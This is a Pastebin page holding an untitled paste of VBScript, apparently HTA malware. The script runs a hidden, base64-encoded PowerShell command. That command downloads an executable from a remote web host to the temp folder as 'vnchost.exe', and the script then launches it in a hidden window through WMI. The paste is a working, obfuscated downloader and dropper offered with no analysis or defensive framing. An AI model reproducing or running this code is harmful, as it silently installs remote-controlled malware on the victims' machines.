Advertisement
Guest User

Untitled

a guest
Apr 22nd, 2019
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.17 KB | None | 0 0
  1. <script language="VBScript">
  2. Function var_gilan()
  3. Dim lolirun
  4. Set lolirun = CreateObject("Wscript.Shell")
  5. temp = lolirun.expandEnvironmentStrings("%temp%")
  6. lolirun.run "powershell.exe -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAG0AYQBpAGwALgBmAG0AMwA0ADgALgBiAGgAcwB0AHUAZABlAG4AdABzAC4AbgBlAHQALwBmAGEAcgBhAGgAawB1AG4ALwB3AHAALQBhAGQAbQBpAG4ALwBqAHMALwBtAGsAZAAvAHgAcABsAHIALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAHYAbgBjAGgAbwBzAHQALgBlAHgAZQAiACkAKQA7AA==", 0, true
  7. End Function
  8. Sub window_onload
  9. const impersonation = 3
  10. Const HIDDEN_WINDOW = 12
  11. Set Locator = CreateObject("WbemScripting.SWbemLocator")
  12. Set Service = Locator.ConnectServer()
  13. Service.Security_.ImpersonationLevel=impersonation
  14. Set objStartup = Service.Get("Win32_ProcessStartup")
  15. Set objConfig = objStartup.SpawnInstance_
  16. objConfig.ShowWindow = HIDDEN_WINDOW
  17. Set Process = Service.Get("Win32_Process")
  18. Error = Process.Create("cmd /c %temp%\vnchost.exe", null, objConfig, intProcessID)
  19. window.close()
  20. end sub
  21.  
  22.  
  23. var_gilan
  24. self.close
  25. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement